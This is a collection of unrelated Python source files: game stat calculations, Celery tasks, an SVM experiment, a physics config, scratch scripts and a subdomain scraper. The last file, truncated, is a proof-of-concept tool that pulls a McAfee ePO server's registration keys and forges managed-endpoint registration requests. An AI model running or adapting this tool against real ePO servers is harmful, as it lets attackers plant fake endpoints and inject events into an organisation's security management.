multipliers.hp *= get_mult(other_fields[2])
if get_mult(other_fields[3]) != 0:
multipliers.atk *= get_mult(other_fields[3])
if get_mult(other_fields[4]) != 0:
multipliers.rcv *= get_mult(other_fields[4])
if get_last(other_fields) != 0:
multipliers.shield = get_last(other_fields)
elif skill == 131:
if length == 4:
multipliers.atk *= get_last(other_fields)
elif length == 7:
if get_mult(other_fields[2]) != 0:
multipliers.hp *= get_mult(other_fields[2])
if get_mult(other_fields[3]) != 0:
multipliers.atk *= get_mult(other_fields[3])
if get_mult(other_fields[4]) != 0:
multipliers.rcv *= get_mult(other_fields[4])
if get_last(other_fields) != 0:
multipliers.shield = get_last(other_fields)
elif skill == 133:
if length == 3:
multipliers.atk *= get_last(other_fields)
elif length == 4:
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
multipliers.rcv *= get_last(other_fields)
elif skill == 136:
if length == 6:
multipliers.atk *= get_mult(other_fields[2])
if get_last(other_fields) > 1:
multipliers.hp *= get_last(other_fields)
elif length == 7:
multipliers.atk *= get_mult(other_fields[2]) * get_last(other_fields)
elif length == 8:
if get_mult(other_fields[2]) > 1:
multipliers.atk *= get_mult(other_fields[2])
if get_mult(other_fields[1]) > 1:
multipliers.hp *= get_mult(other_fields[1])
if get_mult(other_fields[3]) > 1:
multipliers.rcv *= get_mult(other_fields[3])
if get_second_last(other_fields) > 1:
multipliers.atk *= get_second_last(other_fields)
if get_third_last(other_fields) > 1:
multipliers.hp *= get_third_last(other_fields)
if get_last(other_fields) > 1:
multipliers.rcv *= get_last(other_fields)
elif skill == 137:
if length == 6:
multipliers.atk *= get_mult(other_fields[2])
multipliers.hp *= get_last(other_fields)
elif length == 7:
if other_fields[1] != 0:
multipliers.hp *= get_mult(other_fields[1])
multipliers.atk *= get_mult(other_fields[2]) * get_last(other_fields)
if other_fields[3] != 0:
multipliers.rcv *= get_mult(other_fields[3])
elif length == 8:
if get_mult(other_fields[1]) != 0:
multipliers.hp *= get_mult(other_fields[1])
if get_mult(other_fields[2]) != 0:
multipliers.atk *= get_mult(other_fields[2])
if get_mult(other_fields[3]) != 0:
multipliers.rcv *= get_mult(other_fields[3])
if get_third_last(other_fields) != 0:
multipliers.hp *= get_third_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
elif skill == 139:
if length == 5:
multipliers.atk *= get_last(other_fields)
if length == 7 or length == 8:
multipliers.atk *= max(get_mult(other_fields[4]), get_last(other_fields))
elif skill == 151:
if other_fields[0] != 0:
multipliers.atk *= get_mult(other_fields[0])
multipliers.shield = get_last(other_fields)
elif skill == 155:
if length == 4:
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
multipliers.atk *= get_last(other_fields)
elif length == 5:
if get_third_last(other_fields) != 0:
multipliers.hp *= get_third_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
elif skill == 156:
if length > 0:
check = other_fields[-2]
if check == 2:
multipliers.atk *= get_last(other_fields)
if check == 3:
multipliers.shield = get_last(other_fields)
elif skill == 157:
if length == 2:
multipliers.atk *= get_last(other_fields) ** 2
if length == 4:
multipliers.atk *= get_last(other_fields) ** 3
if length == 6:
multipliers.atk *= get_last(other_fields) ** 3
elif skill == 158:
if length == 4:
multipliers.atk *= get_last(other_fields)
elif length == 5:
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.atk *= get_last(other_fields)
elif length == 6:
if get_third_last(other_fields) != 0:
multipliers.rcv *= get_third_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.atk *= get_last(other_fields)
elif skill == 163:
if length == 4:
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
multipliers.atk *= get_last(other_fields)
if length == 5:
if get_third_last(other_fields) != 0:
multipliers.hp *= get_third_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
if length == 6 or length == 7:
multipliers.shield = get_last(other_fields)
elif skill == 164:
if length == 7:
multipliers.atk *= get_second_last(other_fields)
multipliers.rcv *= get_last(other_fields)
if length == 8:
multipliers.atk *= get_third_last(other_fields)
multipliers.rcv *= get_second_last(other_fields)
if other_fields[4] == 1:
multipliers.atk += get_last(other_fields)
multipliers.rcv += get_last(other_fields)
elif other_fields[4] == 2:
multipliers.atk += get_last(other_fields)
elif skill == 165:
if length == 4:
multipliers.atk *= get_second_last(other_fields)
multipliers.rcv *= get_last(other_fields)
if length == 7:
multipliers.atk *= get_mult(other_fields[2]) + \
get_third_last(other_fields) * other_fields[-1]
multipliers.rcv *= get_mult(other_fields[3]) + \
get_second_last(other_fields) * other_fields[-1]
elif skill == 166:
multipliers.atk *= get_mult(other_fields[1]) + (other_fields[-1] - other_fields[0]) * get_third_last(
other_fields)
multipliers.rcv *= get_mult(other_fields[2]) + (other_fields[-1] - other_fields[0]) * get_second_last(
other_fields)
elif skill == 167:
if length == 4:
multipliers.atk *= get_second_last(other_fields)
multipliers.rcv *= get_last(other_fields)
elif length == 7:
diff = other_fields[-1] - other_fields[1]
multipliers.atk *= get_mult(other_fields[2]) + diff * get_third_last(other_fields)
multipliers.rcv *= get_mult(other_fields[3]) + diff * get_second_last(other_fields)
elif skill in [169, 170, 171, 182]:
if length > 0:
if get_second_last(other_fields) > 1:
multipliers.atk *= get_second_last(other_fields)
multipliers.shield = get_last(other_fields)
elif skill == 175:
if length == 5:
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
multipliers.atk *= get_last(other_fields)
if length == 6:
if get_third_last(other_fields) != 0:
multipliers.hp *= get_third_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
elif skill == 177:
if length == 7:
multipliers.atk *= get_last(other_fields)
elif length == 8:
multipliers.atk *= get_second_last(other_fields) + \
other_fields[-3] * get_last(other_fields)
elif skill in [178, 185]:
if length == 4:
multipliers.hp *= get_last(other_fields)
elif length == 5:
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
multipliers.atk *= get_last(other_fields)
elif length == 6:
if get_third_last(other_fields) != 0:
multipliers.hp *= get_third_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
elif skill == 183:
if length == 4 or length == 7:
multipliers.atk *= get_last(other_fields)
elif length == 5:
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
multipliers.shield = get_last(other_fields)
elif length == 8:
multipliers.atk *= max(get_mult(other_fields[3]), get_second_last(other_fields))
multipliers.rcv *= max(get_mult(other_fields[4]), get_last(other_fields))
elif skill == 186:
if length == 4:
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.atk *= get_last(other_fields)
elif length == 5:
if get_third_last(other_fields) != 0:
multipliers.hp *= get_third_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
return multipliers
def get_mult(val):
return val / 100
def get_last(other_fields):
if len(other_fields) != 0:
return other_fields[-1] / 100
else:
return 1
def get_second_last(other_fields):
if len(other_fields) != 0:
return other_fields[-2] / 100
else:
return 1
def get_third_last(other_fields):
if len(other_fields) != 0:
return other_fields[-3] / 100
else:
return 1
|
17,038 | ddf18ac8eed85cf890e0465d7b58268354848eec | import datetime
from myflaskapp import celery
from models.model import Auction
from controllers.auction_controller import AuctionController
from celery import chain
from celery.result import AsyncResult
def set_countdown(id, delay):
return chain(set_active.si(id).set(eta=delay), deactivate.si(id).set(countdown=10))()
@celery.task()
def set_active(id):
'''
Called when an auction first becomes active, and when the end time for an auction is reached,
and then takes actions to maintain the state of the auction properly.
'''
# if this is the first heartbeat, take care of activating the auction
auction = Auction.query.filter_by(id=id).first()
auction.active = True
auction.put()
@celery.task(bind=True)
def deactivate(self, id):
auction = Auction.query.filter_by(id=id).first()
if not AuctionController.invoke_autobidders(auction):
AuctionController.close_auction(auction)
else:
self.apply_async((id), countdown=10)
@celery.task
def cancel(task_id):
AsyncResult(task_id).revoke() |
17,039 | 63ef831df8ea4c5053e0112e70ab41244d7c775f | import pickle
from sklearn.cross_validation import KFold
import numpy as np
import svm_classify as svm
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.preprocessing import normalize
import load_data as ld
import load_data as Tokenizer
from sklearn.metrics import accuracy_score
DESIGN_MATRIX_PATH = 'pure_counts_df5.pkl'
X, vectorizer = pickle.load(open(DESIGN_MATRIX_PATH))
y = ld.get_labels(document_paths('train'))
words = vectorizer.get_feature_names()
X = X.toarray()
X, words = ld.remove_numerals(X, words)
X, words = ld.lemmatize_design_matrix(X, words)
kf = KFold(X.shape[0], n_folds=5)
C = [1, 0.1, 0.01, 0.001, 0.0001, 0.00001]
kernels = ['poly', 'linear']
degrees = range(2, 5)
cross_validated_values = [[0] * 3, [0] * len(C), [0] * 2, [0] * 4]
for design_matrix_version in range(3):
for c in range(len(C)):
for k in range(len(kernels)):
if kernels[k] == 'poly':
for d in degrees:
current_model_accuracies = []
for train_indices, test_indices in kf:
X_train, X_test = X[train_indices, :], X[
test_indices, :]
y_train, y_test = y[train_indices], y[test_indices]
if design_matrix_version == 0:
transformer = TfidfTransformer()
X_train = transformer.fit_transform(X_train)
X_test = transformer.transform(X_test)
elif design_matrix_version == 1:
X_train, X_test = X_train.astype(
float), X_test.astype(float)
X_train = normalize(X_train, axis=1, norm='l1')
X_test = normalize(X_test, axis=1, norm='l1')
model = svm.Classifier(X_train,
y_train,
C=C[c],
kernel=kernels[k],
degree=degrees[d])
print design_matrix_version, lemmatize_version, c, k, "deg = %d" % d
model.train()
print "previous values worked"
predicted_y = model.predict(X_test)
current_model_accuracies.append(accuracy_score(
y_test, predicted_y))
cross_validated_values[design_matrix_version, c, k, d -
1] = (np.mean(np.array(
current_model_accuracies)), model)
else: #if kernel is either linear or rbf we dont iterate over degree
current_model_accuracies = []
for train_indices, test_indices in kf:
X_train, X_test = X[train_indices, :], X[test_indices, :]
y_train, y_test = y[train_indices], y[test_indices]
if design_matrix_version == 0:
transformer = TfidfTransformer()
X_train = transformer.fit_transform(X_train)
X_test = transformer.transform(X_test)
elif design_matrix_version == 1:
X_train, X_test = X_train.astype(float), X_test.astype(
float)
X_train = normalize(X_train, axis=1, norm='l1')
X_test = normalize(X_test, axis=1, norm='l1')
model = svm.Classifier(X_train,
y_train,
C=C[c],
kernel=kernels[k])
print(design_matrix_version, lemmatize_version, c, k)
model.train()
print "previous values worked"
predicted_y = model.predict(X_test)
current_model_accuracies.append(accuracy_score(
y_test, predicted_y))
cross_validated_values[design_matrix_version, c, k,
0] = (np.mean(np.array(
current_model_accuracies)), model)
pickle.dump(cross_validated_values, open('svm_cross_validated_values.pkl',
'w+'))
|
17,040 | 316557081de965fd39f17460ff7d2165c75618a1 | import numpy as np
import random
a=[1,2,4,5,3,4,5,6,7,6,5,2,1]
li=np.random.choice(range(1,2))
print(li) |
17,041 | 5ab105aebd33987f1da198ffa0e15533eb4ca434 | # Auto generated configuration file
# using:
# Revision: 1.207
# Source: /cvs_server/repositories/CMSSW/CMSSW/Configuration/PyReleaseValidation/python/ConfigBuilder.py,v
# with command line options: l1test -s DIGI,L1,DIGI2RAW,HLT:HIon --conditions auto:mc --no_exec
import FWCore.ParameterSet.Config as cms
process = cms.Process('HLT2')
process.load('Configuration.StandardSequences.Services_cff')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load("Configuration.StandardSequences.MagneticField_cff")
process.load("Configuration.Geometry.GeometryIdeal_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.globaltag = 'STARTHI53_V28::All'
process.load("Configuration.StandardSequences.Reconstruction_cff")
#process.load("HLTrigger.Configuration.HLT_PIon_cff")
from HeavyIonsAnalysis.Configuration.CommonFunctions_cff import *
overrideCentrality(process)
process.HeavyIonGlobalParameters = cms.PSet(
centralityVariable = cms.string("HFtowersPlusTrunc"),
nonDefaultGlauberModel = cms.string(""),
centralitySrc = cms.InputTag("pACentrality")
)
process.load('RecoHI.HiCentralityAlgos.HiCentrality_cfi')
process.options = cms.untracked.PSet(
wantSummary=cms.untracked.bool(True),
SkipEvent = cms.untracked.vstring('ProductNotFound')
)
process.load("MuonAnalysis.MuonAssociators.patMuonsWithTrigger_cff")
from MuonAnalysis.MuonAssociators.muonL1Match_cfi import *
muonL1Match.matched = cms.InputTag("hltL1extraParticles")
from MuonAnalysis.MuonAssociators.patMuonsWithTrigger_cff import *
useL1MatchingWindowForSinglets(process)
changeTriggerProcessName(process, "HLT") # DATA Mix
patMuonsWithoutTrigger.pvSrc = cms.InputTag("hiSelectedVertex") # Heavy Ion vertex collection
# HLT dimuon trigger
import HLTrigger.HLTfilters.hltHighLevel_cfi
process.hltZMMHI = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()
#process.hltZMMHI.TriggerResultsTag = cms.InputTag("TriggerResults","","HLT2") # signal
process.hltZMMHI.TriggerResultsTag = cms.InputTag("TriggerResults","","DATAMIX") # DATA Mix
process.hltZMMHI.HLTPaths = ["HLT_HIL2Mu20"]
process.hltZMMHI.throw = False
process.hltZMMHI.andOr = True
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
#skipEvents = cms.untracked.uint32(0),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring(
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_1.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_2.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_3.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_4.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_5.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_6.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_7.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_8.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_9.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_10.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_11.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_12.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_13.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_14.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_15.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_16.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_17.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_18.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_19.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_20.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_21.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_22.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_23.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_24.root",
"/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_25.root",
),
)
process.analyzer = cms.EDAnalyzer('HLTrgAna',
genSource = cms.untracked.InputTag("hiGenParticles"),
L1MuCands = cms.untracked.InputTag("l1extraParticles"),
#L1MuCands = cms.untracked.InputTag("hltL1extraParticles"),
L2MuCands = cms.untracked.InputTag("hltL2MuonCandidates"),
L3MuCands = cms.untracked.InputTag("hltL3MuonCandidates"),
gtObjects = cms.untracked.InputTag("gtDigis"),
#gtObjects = cms.untracked.InputTag("hltGtDigis"),
vertex = cms.untracked.InputTag("offlinePrimaryVertices"),
#vertex = cms.untracked.InputTag("hltPixelVertices"),
BeamSpot = cms.untracked.InputTag("BeamSpot"),
TriggerResults = cms.InputTag("TriggerResults","","HLT"),
#TriggerResults = cms.InputTag("TriggerResults","","HLT1"),
#TriggerResults = cms.InputTag("TriggerResults","","DATAMIX"),
muTrackTag = cms.InputTag("globalMuons"),
muontag = cms.untracked.InputTag("muons"),
staMuonsTag = cms.InputTag("standAloneMuons","UpdatedAtVtx"),
patMuonsTag = cms.InputTag("patMuonsWithTrigger"),
hOutputFile = cms.untracked.string("HLTrgAna_RelVal_JpsiMM.root"),
doMC = cms.bool(True),
doHiMC = cms.bool(False),
doSIM = cms.bool(False),
doL1Bit = cms.bool(True),
doL1 = cms.bool(True),
doL2 = cms.bool(True),
doL3 = cms.bool(True),
doHLT = cms.bool(True),
doRECO = cms.bool(True),
doREGIT = cms.bool(True),
TrgClass = cms.untracked.int32(0), # 0 : PbPb, 1 : pPb
NoTrg = cms.untracked.int32(16), # No of Trg
doCentrality = cms.bool(False),
doPAT = cms.bool(False),
)
process.totalAnalyzer = cms.Path(process.analyzer)
|
17,042 | 2895bbc82b9099f7251ab83b7298c786bb658387 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''=================================================
@Project -> File :locust -> test.py
@IDE :PyCharm
@Author :Mr. XieYueLv
@Date :2021/8/15 1:04
@Desc :
=================================================='''
# import time
#
# now_time_stamp = time.time()
# print(now_time_stamp)
# time_data = time.ctime(now_time_stamp)
# print(type(time_data))
# print(time_data.split(" ")[3])
# import requests
# res = requests.sessions.session()
# def login():
# url = "http://192.168.48.141:8282/login"
# data = {"username": "lock", "password": "opms123456"}
# ress = res.post(url=url, data=data)
# return ress.json()
#
#
# def add_project():
# url = "http://192.168.48.141:8282/project/add"
# data = {"name": "xieyuelv",
# "aliasname": "谢谢",
# "started": "2021-08-23",
# "ended": "2021-08-23",
# "desc": "test",
# "id": 0}
# login()
# ress = res.post(url=url,data=data)
# return ress.json()
#
# # lg = login()
# # print(lg)
# # get_manager()
# ap = add_project()
# print(ap)
# k = 1000
# sum = 0
# while k > 1:
# print(k)
# k = k / 2
# print(sum)
# import re
# str1 = "Python's features"
# str2 = re.match(r'(.*)on(.*?).*',str1)
# print(str2.group(1))
# def adder(x):
# def wrapper(y):
# return x + y
# return wrapper
# adder5 = adder(5)
# print(adder5(adder5(6)))
# b1 = [1,2,3]
# b2 = [2,3,4]
# b3 = [val for val in b1 if val in b2]
# print(b3)
# import re
#
# line = "Cats are smarter than dogs"
# print(re.match('(.*?) are (.*?) than (.*)',line).group(2))
#获取并打印google首页的html
# import urllib.request
# # response=urllib.request.urlopen('http://123.56.170.43:7272/')
# # html=response.read()
# # print(html)
# url = "http://123.56.170.43:7272/"
# re_sp = urllib.request.Request(url=url).get_header("headers")
# print(re_sp)
# a = {"a":1}
# print(a['a'])
#
# b = [8,3,2,6,19,7]
# b.reverse()
# print(b)
# b.sort(reverse=True)
# print(b)
#-*-coding:utf-8-*-
# Time:2017/9/21 19:02
# Author:YangYangJun
# from openpyxl import Workbook
# from openpyxl.reader.excel import load_workbook
#
# import os
# import time
#
#
#
# def writeExcel():
# # 获取文件路径
# excelPath = os.path.join(os.getcwd(), 'ExcelData')
# print ("****")
# print (excelPath)
# # 定义文件名称
# # invalid mode ('wb') or filename: 'Excel2017-09-21_20:15:57.xlsx' 这种方式明明文件,会提示保存失败,无效的文件名。
# # nameTime = time.strftime('%Y-%m-%d_%H:%M:%S')
# nameTime = time.strftime('%Y-%m-%d_%H-%M-%S')
# excelName = 'Excel' + nameTime + '.xlsx'
# ExcelFullName= os.path.join(excelPath,excelName)
# print (ExcelFullName)
#
# wb = Workbook()
#
# ws = wb.active
#
# tableTitle = ['userName', 'Phone', 'age', 'Remark']
#
# # 维护表头
# # if row < 1 or column < 1:
# # raise ValueError("Row or column values must be at least 1")
# # 如上,openpyxl 的首行、首列 是 (1,1)而不是(0,0),如果坐标输入含有小于1的值,提示 :Row or column values must be at least 1,即最小值为1.
# for col in range(len(tableTitle)):
# c = col + 1
# ws.cell(row=1, column=c).value = tableTitle[col]
#
# # 数据表基本信息
# tableValues = [['张学友', 15201062100, 18, '测试数据!'], ['李雷', 15201062598, 19, '测试数据!'],['Marry', 15201062191, 28, '测试数据!']]
#
# for row in range(len(tableValues)):
# ws.append(tableValues[row])
# #wb.save(ExcelFullName)
# wb.save(filename=ExcelFullName)
# return ExcelFullName
#
# def readExcel(ExcelFullName):
# wb = load_workbook(ExcelFullName)
# #wb = load_workbook(filename=ExcelFullName)
#
# # 获取当前活跃的worksheet,默认就是第一个worksheet
# #ws = wb.active
# # 当然也可以使用下面的方法
# # 获取所有表格(worksheet)的名字
# sheets = wb.get_sheet_names()
# print (sheets)
# # # 第一个表格的名称
# sheet_first = sheets[0]
# # # 获取特定的worksheet
# #
# ws = wb.get_sheet_by_name(sheet_first)
# print ("***")
# print (sheet_first)
# print (ws.title)
# print ("^^^")
# # 获取表格所有行和列,两者都是可迭代的
#
# rows = ws.rows
# print (rows)
#
# columns = ws.columns
#
# # 迭代所有的行
#
# for row in rows:
#
# line = [col.value for col in row]
#
# print (line)
#
# # 通过坐标读取值
#
# print (ws['A1'].value) # A表示列,1表示行
#
# print (ws.cell(row=1, column=1).value)
#
# if __name__ == '__main__':
# ExcelFullName = writeExcel()
# readExcel(ExcelFullName)
# 检查两个字符串的组成元素是否一样
# from collections import Counter
# def diff(one, two):
# return Counter(one) == Counter(two)
#
# print(diff("asd","asd1"))
#
# # 打印N次字符串
# n = 3
# s = "我的fauk\n"
# print(s * n)
#
# # 大写第一个字母
# a = "我的-as dsa"
# print(a.title())
import random
print(random.randint(1,1000))
print(random.choice("asdfghjk"))
print(random.sample("asdfgqwer",3))
|
17,043 | f31bb5e56bbec825426f15fc9e4664b4811f2488 | import numpy as np
import matplotlib.pyplot as plt
front1 = np.load('solutions-off-resonance/prelim-1a-front.npy')
front2 = np.load('solutions-off-resonance/prelim-1b-front.npy')
front3 = np.load('solutions-off-resonance/prelim-1c-front.npy')
fig, ax = plt.subplots()
ax.scatter(-front1[:,0]*1e-3, front1[:,1], c='b', label='Low Detail')
ax.scatter(-front2[:,0]*1e-3, front2[:,1], c='r', label='High Detail')
ax.scatter(-front3[:,0]*1e-3, front3[:,1], c='g', label='Rectangular')
ax.set_xlabel('Frequency (kHz)')
ax.set_ylabel('Stiffness (N/m)')
ax.set_ylim(0, 6000)
ax.set_xlim(0, 10000)
ax.legend()
fig, ax = plt.subplots()
ax.scatter(-front1[:,0]*1e-3, front1[:,1], c='b', label='Low Detail')
ax.scatter(-front2[:,0]*1e-3, front2[:,1], c='r', label='High Detail')
ax.scatter(-front3[:,0]*1e-3, front3[:,1], c='g', label='Rectangular')
ax.set_xlabel('Frequency (kHz)')
ax.set_ylabel('Stiffness (N/m)')
ax.set_ylim(0, 50)
ax.set_xlim(0, 100)
ax.legend()
|
17,044 | 354542acfe1a0d7543b8f6386fddd1bf6f982397 | # -*- coding:utf-8 -*-
# !/usr/bin/env python
import re
import traceback
from lib.common import HttpReq, CheckDomainFormat
def get_subdomains(domain):
subdomains = []
try:
url = 'http://alexa.chinaz.com/?domain={}'.format(domain)
_, content = HttpReq(url)
regex = re.compile(r'(?<="\>\r\n<li>).*?(?=</li>)')
result = regex.findall(content)
subdomains = [sub for sub in result if CheckDomainFormat(sub)]
except TypeError:
pass
except:
traceback.print_exc()
finally:
return list(set(subdomains))
|
17,045 | e392a65ba10bcc3cc18156bf57d4d23dd18c6c91 | from chat import create_app
# 创建App实例
app = create_app() |
17,046 | e6ba343434ef2d1285775e7d4e598fb5882ff02e | print'LAB02, Question 4'
print''
i = 0
while i > 10:
i += 1
if i%2 == 0:
print i
print 'this is an infinite loop'
|
17,047 | 0049ed90bbd78398412f64c19d1cbfeaa418f327 | #!/usr/bin/env python3
""" EPO Managed Endpoint Inject - Script to demonstrate weakness in EPO managed endpoint registration mechanism to allow arbitrary managed endpoint registration.
By design, McAfee ePO server exposes server public key and server registration key via Master Repository. These two keys can be downloaded by anyone and used to construct endpoint registration message or send events.
Tested and Confirmed on EPO 4.x/5.x
Harry Phung - harryuts\@\gmail.com
V1.0
"""
import struct
import mcafee_crypto
import endpoint
import socket
import argparse
from base64 import b64encode
import urllib.request
import ssl
class Build_Registration_Request:
"""Class for building registration request"""
def __init__(self, epo_url, agent_guid, transaction_guid, agent_hostname, agent_mac_address):
self.epo_url = epo_url
self.agent_guid = agent_guid
self.agent_hostname = agent_hostname
self.transaction_guid = b'{%s}' % transaction_guid
self.agent_mac_address = agent_mac_address
self.serverkeyhash = b''
self.regkey = b''
self.header_1 = b''
self.header_2 = b''
self.fullprops_xml = b''
self.register_request = b''
self.agent_pubkey_epo_format = b''
self.epo = None
self.setup()
def getfilehttps(self, url):
"""Download file via https"""
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
response = urllib.request.urlopen(url, context=ctx)
result = response.read()
return result
def setup(self):
"""Build server keyhash and generate agent key"""
self.build_serverkeyhash()
self.build_agent_pubkey()
self.load_registration_key()
def build_serverkeyhash(self):
"""Build server key hash based on server public key"""
server_publickey = self.getfilehttps(self.epo_url + "srpubkey.bin")
self.serverkeyhash = b64encode(mcafee_crypto.SHA1(server_publickey))
return self.serverkeyhash
def build_agent_pubkey(self):
"""Generate Agent Public Key"""
self.agent_pubkey_epo_format = mcafee_crypto.generate_DSA_agentkey()
def load_registration_key(self):
"""Build registration key to correct format expected by ePO"""
key = self.getfilehttps(self.epo_url + "reqseckey.bin")
reqseckey_p = int(key[2:130].hex(),16)
reqseckey_q = int(key[132:152].hex(),16)
reqseckey_g = int(key[154:282].hex(),16)
reqseckey_pub = int(key[284:412].hex(),16)
reqseckey_priv = int(key[415:435].hex(),16)
dsa_key = (reqseckey_pub, reqseckey_g, reqseckey_p, reqseckey_q, reqseckey_priv)
self.regkey = dsa_key
def build_header_1(self, header_len=b'\x00\x00\x00\x00', data_len=b'\x00\x00\x00\x00'):
"""Build header 1 in request"""
self.header_1 = b''
header_1_dict = {'preamble': b'\x50\x4f',
'packet_type': b'\x01\x00\x00\x50',
'header_len': header_len + b'\x02\x00\x00\x00\x00\x00\x00\x00',
'data_len': data_len,
'agent_guid': b'{%s}' % self.agent_guid,
'agent_guid_padding': b'\x00' * 90 + b'\x01\x00\x00\x00',
'agent_hostname': b'%s' % self.agent_hostname,
'hostname_padding': b'\x00' * (32 - len(self.agent_hostname)) + b'\x00' * 48}
for item in header_1_dict:
self.header_1 += header_1_dict[item]
return self.header_1
def build_header_2_40(self):
"""Build header 2 in request"""
self.header_2 = b'\x0e\x00\x00\x00AssignmentList\x01\x00\x00\x000' + \
(b'\x0c\x00\x00\x00ComputerName' + len(self.agent_hostname).to_bytes(4, 'little') + self.agent_hostname) + \
(b'\n\x00\x00\x00DomainName\t\x00\x00\x00WORKGROUP'
b'\x12\x00\x00\x00EventFilterVersion\x01\x00\x00\x000'
b'\x19\x00\x00\x00GuidRegenerationSupported\x01\x00\x00\x001'
b'\t\x00\x00\x00IPAddress\x0f\x00\x00\x00192.168.236.199') + \
b'\n\x00\x00\x00NETAddress' + len(self.agent_mac_address).to_bytes(4, 'little') +self.agent_mac_address + \
(b'\x0b\x00\x00\x00PackageType\x0b\x00\x00\x00AgentPubKey'
